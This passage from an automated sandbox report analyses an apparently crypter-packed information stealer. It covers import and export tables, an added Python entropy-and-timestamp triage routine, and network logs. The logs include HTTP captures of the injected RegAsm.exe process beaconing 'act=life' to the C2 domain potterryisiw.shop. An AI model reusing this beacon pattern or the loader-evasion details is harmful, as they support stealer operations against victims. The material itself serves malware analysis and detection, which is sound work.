KERNEL32.dll | CreateFileW, HeapSize, GetProcessHeap, SetStdHandle, WaitForSingleObject, CreateThread, VirtualAlloc, GetModuleHandleA, GetProcAddress, GetConsoleWindow, CloseHandle, WaitForSingleObjectEx, GetCurrentThreadId, GetExitCodeThread, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceCounter, ReleaseSRWLockExclusive, WakeAllConditionVariable, EncodePointer, DecodePointer, MultiByteToWideChar, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, SetEnvironmentVariableW, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, GetFileType, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW

Apart from the Visual C++ runtime start-up set, the only imports of note are VirtualAlloc, CreateThread, GetModuleHandleA and GetProcAddress; nothing for networking, browsers or the registry is imported statically, so the stealer's real API set is resolved at runtime (see the loader-functionality signature above). The lone USER32 import (OffsetRect) and the export with a keyboard-mash name below are typical of a crypter stub.

Exports
Name | Ordinal | Address
IUAhsiuchniuohAIU | 1 | 0x424d00
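The static fields above (section table, file size, compile timestamp 0x66810EB7 the day before analysis) are enough for a first-pass packer verdict without running the sample. The Python below is an added example, not taken from the report or from Joe Sandbox, that encodes those checks: a Shannon entropy function matching the report's Entropy column and a triage routine over the section metadata transcribed from the table above. The thresholds (7.5 bits per byte, 25% of the file, a 7-day compile-to-first-seen window) and the use of the analysis start time as "first seen" are assumptions made for illustration.

```python
from __future__ import annotations

import math
from collections import Counter
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import FrozenSet, List


@dataclass(frozen=True)
class Section:
    name: str
    vaddr: int
    vsize: int
    rawsize: int
    entropy: float
    characteristics: FrozenSet[str]


def sec(name, vaddr, vsize, rawsize, entropy, *chars) -> Section:
    return Section(name, vaddr, vsize, rawsize, entropy, frozenset(chars))


# Section table of mkFOY01Gl5.exe, transcribed from the report (entropy rounded).
SECTIONS: List[Section] = [
    sec(".text",  0x1000,  0x22e06, 0x23000, 6.6395, "CNT_CODE", "MEM_EXECUTE", "MEM_READ"),
    sec(".BsS",   0x24000, 0xe1d,   0x1000,  5.9592, "CNT_CODE", "MEM_EXECUTE", "MEM_READ"),
    sec(".rdata", 0x25000, 0xae34,  0xb000,  5.0434, "CNT_INITIALIZED_DATA", "MEM_READ"),
    sec(".data",  0x30000, 0x50cf4, 0x4fe00, 7.9908, "CNT_INITIALIZED_DATA", "MEM_READ", "MEM_WRITE"),
    sec(".reloc", 0x81000, 0x1d1c,  0x1e00,  6.4932, "CNT_INITIALIZED_DATA", "MEM_DISCARDABLE", "MEM_READ"),
]
FILE_SIZE = 528_384                # bytes, from the report
PE_TIMESTAMP = 0x66810EB7          # IMAGE_FILE_HEADER.TimeDateStamp, from the report
FIRST_SEEN = datetime(2024, 7, 1, 7, 22, 27, tzinfo=timezone.utc)   # analysis start, 09:22:27 +02:00

# Thresholds chosen for illustration, not taken from the report.
HIGH_ENTROPY = 7.5        # bits/byte; compressed or encrypted data sits near 8.0
PAYLOAD_SHARE = 0.25      # a payload carrier holds a large share of the file
FRESH_DAYS = 7            # compile-to-first-seen gap worth noting
STANDARD_NAMES = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                  ".edata", ".pdata", ".tls", ".bss", ".CRT", ".textbss"}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0..8.0), the measure in the Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pe_timestamp_utc(timestamp: int) -> datetime:
    """TimeDateStamp is seconds since the Unix epoch, despite living in a PE header."""
    return datetime.fromtimestamp(timestamp, tz=timezone.utc)


def triage_sections(sections: List[Section], file_size: int = FILE_SIZE,
                    timestamp: int = PE_TIMESTAMP, first_seen: datetime = FIRST_SEEN) -> dict:
    """Static red flags: encrypted payload carriers, oddly named or W+X code
    sections, and a compile time suspiciously close to first observation."""
    compiled = pe_timestamp_utc(timestamp)
    age_days = (first_seen - compiled).total_seconds() / 86400
    payload = [s.name for s in sections
               if s.entropy >= HIGH_ENTROPY and s.rawsize / file_size >= PAYLOAD_SHARE]
    odd_exec = [s.name for s in sections
                if "MEM_EXECUTE" in s.characteristics and s.name not in STANDARD_NAMES]
    wx = [s.name for s in sections if {"MEM_EXECUTE", "MEM_WRITE"} <= s.characteristics]
    notes = []
    for s in sections:
        if s.name in payload:
            access = "writable" if "MEM_WRITE" in s.characteristics else "read-only"
            notes.append(f"{s.name}: entropy {s.entropy:.2f}, "
                         f"{100 * s.rawsize / file_size:.0f}% of file, {access}")
    if age_days < FRESH_DAYS:
        notes.append(f"compiled {age_days:.1f} days before first observation")
    return {
        "compiled_utc": compiled.strftime("%Y-%m-%dT%H:%M:%SZ"),
        "age_days": round(age_days, 2),
        "payload_candidates": payload,
        "nonstandard_exec_sections": odd_exec,
        "writable_exec_sections": wx,
        "notes": notes,
    }


if __name__ == "__main__":
    for key, value in triage_sections(SECTIONS).items():
        print(f"{key}: {value}")
```

For this sample the routine names .data as the payload carrier, .BsS as an executable section with a non-standard name, and a compile time roughly one day before the analysis; the entropy function can be run over the raw bytes of any section read from disk to reproduce the report's column values.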
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 1, 2024 09:23:35.287076950 CEST | 49704 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:35.287127018 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:35.287193060 CEST | 49704 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:35.289505005 CEST | 49704 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:35.289526939 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:51.063465118 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:51.063615084 CEST | 49704 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:51.067439079 CEST | 49704 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:51.067455053 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:51.067749023 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:51.120342016 CEST | 49704 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:51.120362997 CEST | 49704 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:51.120522976 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:51.507936001 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:51.508028984 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:51.508122921 CEST | 49704 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:51.510570049 CEST | 49704 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:51.510600090 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:51.510615110 CEST | 49704 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:51.510622025 CEST | 443 | 49704 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:51.516469002 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:51.516520977 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:51.516696930 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:51.517065048 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:51.517074108 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.250397921 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.250524044 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.252046108 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.252053976 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.252305984 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.255815029 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.255844116 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.255911112 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.692200899 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.692240953 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.692274094 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.692332029 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.692339897 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.692382097 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.692385912 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.692420006 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.692449093 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.692497969 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.692502975 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.692573071 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.692744970 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.692888975 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.693026066 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.693032026 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.735049009 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.735059023 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.781858921 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.784363985 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.784504890 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.784533978 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.784558058 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.784569979 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.784578085 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.784621000 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.784720898 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.784770966 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.785049915 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.785063982 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.785087109 CEST | 49707 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.785094976 CEST | 443 | 49707 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.822515011 CEST | 49708 | 443 | 192.168.2.5 | 188.114.96.3
Jul 1, 2024 09:23:52.822570086 CEST | 443 | 49708 | 188.114.96.3 | 192.168.2.5
Jul 1, 2024 09:23:52.822642088 CEST | 49708 | 443 | 192.168.2.5 | 188.114.96.3
      Jul 1, 2024 09:23:52.822978020 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:52.822998047 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.292536974 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.292622089 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.294410944 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.294428110 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.294707060 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.295975924 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.296132088 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.296160936 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.726450920 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.726541996 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.726609945 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.726772070 CEST49708443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.726797104 CEST44349708188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.775541067 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.775573969 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:53.775713921 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.776020050 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:53.776030064 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.296291113 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.296561003 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.297971010 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.297980070 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.298336029 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.299654007 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.299787998 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.299808979 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.299863100 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.299869061 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.727808952 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.727890015 CEST44349709188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.728008032 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.728028059 CEST49709443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.931252003 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.931314945 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:54.931523085 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.931829929 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:54.931838036 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:55.410425901 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:55.410516977 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:55.411695004 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:55.411726952 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:55.411993980 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:55.413160086 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:55.413330078 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:55.413369894 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:55.413455963 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:55.413475037 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.237123966 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.237222910 CEST44349711188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.237431049 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.237466097 CEST49711443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.329623938 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.329658985 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.329731941 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.330199957 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.330214024 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.801548004 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.801645041 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.802887917 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.802898884 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.803142071 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:56.810775042 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.810842991 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:56.810893059 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.184555054 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.184659004 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.184762001 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.184812069 CEST49714443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.184839964 CEST44349714188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.204365969 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.204401016 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.204499960 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.205003023 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.205014944 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.678580999 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.678715944 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.680118084 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.680129051 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.680368900 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:57.689659119 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.689759016 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:57.689768076 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:58.337007046 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:58.337086916 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:58.337819099 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:58.337960958 CEST49716443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:58.337971926 CEST44349716188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:58.772373915 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:58.772414923 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:58.772597075 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:58.772937059 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:58.772947073 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.258069038 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.258153915 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.262991905 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.263009071 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.263340950 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.264847040 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.265666962 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.265705109 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.265826941 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.265856028 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.266005993 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.266041040 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.266158104 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.266191959 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.266531944 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.266586065 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.266753912 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.266786098 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.266802073 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.266835928 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.266881943 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.266902924 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.266923904 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.267030954 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.267061949 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.278678894 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.278918028 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.278954029 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.278964043 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.278991938 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:23:59.279011965 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:23:59.284048080 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:00.655746937 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:00.655853987 CEST44349719188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:00.656167984 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:00.656186104 CEST49719443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:00.658262014 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:00.658288956 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:00.658371925 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:00.658715010 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:00.658726931 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.165406942 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.165471077 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:01.166763067 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:01.166769981 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.167005062 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.171936989 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:01.171967983 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:01.172044992 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.840889931 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.840986013 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.841029882 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:01.841214895 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:01.841214895 CEST49720443192.168.2.5188.114.96.3
      Jul 1, 2024 09:24:01.841231108 CEST44349720188.114.96.3192.168.2.5
      Jul 1, 2024 09:24:01.841239929 CEST44349720188.114.96.3192.168.2.5
      Timestamp | Source Port | Dest Port | Source IP | Dest IP
      Jul 1, 2024 09:23:34.103715897 CEST | 53170 | 53 | 192.168.2.5 | 1.1.1.1
      Jul 1, 2024 09:23:35.118236065 CEST | 53170 | 53 | 192.168.2.5 | 1.1.1.1
      Jul 1, 2024 09:23:35.261765003 CEST | 53 | 53170 | 1.1.1.1 | 192.168.2.5
      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
      Jul 1, 2024 09:23:34.103715897 CEST | 192.168.2.5 | 1.1.1.1 | 0x8881 | Standard query (0) | potterryisiw.shop | A (IP address) | IN (0x0001) | false
      Jul 1, 2024 09:23:35.118236065 CEST | 192.168.2.5 | 1.1.1.1 | 0x8881 | Standard query (0) | potterryisiw.shop | A (IP address) | IN (0x0001) | false
      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
      Jul 1, 2024 09:23:35.261765003 CEST | 1.1.1.1 | 192.168.2.5 | 0x8881 | No error (0) | potterryisiw.shop | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
      Jul 1, 2024 09:23:35.261765003 CEST | 1.1.1.1 | 192.168.2.5 | 0x8881 | No error (0) | potterryisiw.shop | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
      • potterryisiw.shop
      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
      0 | 192.168.2.5 | 49704 | 188.114.96.3 | 443 | 6176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Timestamp | Bytes transferred | Direction | Data
      2024-07-01 07:23:51 UTC | 264 | OUT | POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: potterryisiw.shop
      2024-07-01 07:23:51 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
      Data Ascii: act=life
      2024-07-01 07:23:51 UTC | 802 | IN | HTTP/1.1 200 OK
      Date: Mon, 01 Jul 2024 07:23:51 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Set-Cookie: PHPSESSID=tqqp9phbopb7kpehflf611j2ta; expires=Fri, 25-Oct-2024 01:10:30 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KqUFscdlFC7SXs2RwuPA9SNQNGWS1yJdeZdnWCiLRTX%2FXNSERLjK4ABwRT6%2FmQ5Yjexd8BaoAsYWl8Hv3tKb7qjUh2R69X8B19yuSLkeqeVDVpQchtrMfR22l33L5guN1qJaYQ%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 89c4a72cda2343a0-EWR
      alt-svc: h3=":443"; ma=86400
      2024-07-01 07:23:51 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
      Data Ascii: 2ok
      2024-07-01 07:23:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
      Data Ascii: 0


      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
      1 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | 6176 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      Timestamp | Bytes transferred | Direction | Data
      2024-07-01 07:23:52 UTC | 265 | OUT | POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
